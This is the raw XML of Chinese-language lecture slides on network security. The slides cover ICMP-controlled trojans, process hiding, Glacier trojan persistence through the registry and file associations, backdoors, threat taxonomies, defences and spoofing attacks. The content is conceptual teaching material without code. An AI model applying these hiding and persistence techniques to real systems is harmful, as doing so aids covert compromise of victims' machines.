              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>一般</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>控制，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据）：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>报文，当出现特殊报文时（比如特殊大小的包、特殊的报文结构等），打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端口等待控制端的连接 .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>真正意义上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>严格使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议传递数据和控制命令。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234498" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>来通讯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="灯片编号占位符 5"/>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E9864FED-B8E4-427E-8DDC-BEDAD9F0B8EA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>进程名字迷惑</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>把木马写入到驱动和内核的级别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过拦截系统调用的服务，替代或嵌入系统功能（驱动程序或动态链接库）如，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>将木马嵌入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>windows.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，系统运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>windows.exe，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>实际上同时运行了木马和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>windows.exe。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马进程不容易发现，发现后没法或不允许删除</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>进程隐藏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="灯片编号占位符 5"/>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80E2A44A-BDD5-455D-8E57-A62449E100A3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>木马具有很强潜伏能力：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>表面上的木马被发现并删除以后，后备木马在一定的条件下会跳出来。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Glacier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（冰河）有两个服务器程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C:\Windows\System\Kernel32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，挂在注册表的启动组中,当电脑启动的时候,会装入内存,这是表面上的木马；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C:\Windows\System\Sysexplr.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，也在注册表中,它修改了文本文件的关联,当点击文本文件的时候,它就启动了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175106" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>特洛伊木马潜伏性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58372" name="灯片编号占位符 5"/>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4E458F90-DC88-4ACE-B3C8-0C300B942C8F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>逻辑炸弹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>流氓软件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>其它恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348"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0BCB65F0-6D47-4B70-B88E-62AB8ACA3AEA}"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smtClean="0"/>
              <a:t>从信息流动的角度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中断、截取、修改、捏造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从威胁的来源看可分为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内部威胁和外部威胁 。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>自然和人为两类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从攻击者的行为上看可以分成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>主动威胁和被动威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>从威胁的动机上看分为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>偶发性威胁与故意性威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>安全威胁分类 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>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lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>指那些绕过安全性控制而获取对程序或系统访问权的程序方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>后门、木马联系与区别</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>联系：均隐藏在用户系统中向外发送信息，而且本身具有一定权限，便于远程计算机对本机控制；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>区别：木马相对独立、完整且功能强大；后门不独立存在，体积小，功能单一。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>后门</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>技术手段：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>运行实时监控程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>防火墙、防病毒软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端口扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查看连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全意识：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不要随意打开来历不明的邮件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不要随意下载来历不明的软件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及时修补漏洞和关闭可疑的端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>尽量少用共享文件夹</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>经常升级系统和更新病毒库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177154" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马与后门的防范方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8A57B97A-A9B9-4020-B3F9-01CE7FC071A4}"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fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>欺骗技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D33B339-3AD4-468E-85FE-A955C169D0B3}"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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络攻击重要手段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>假冒他人的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址发送信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>邮件欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>假冒他人的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址发送信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>假冒他人的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224258" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72707" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
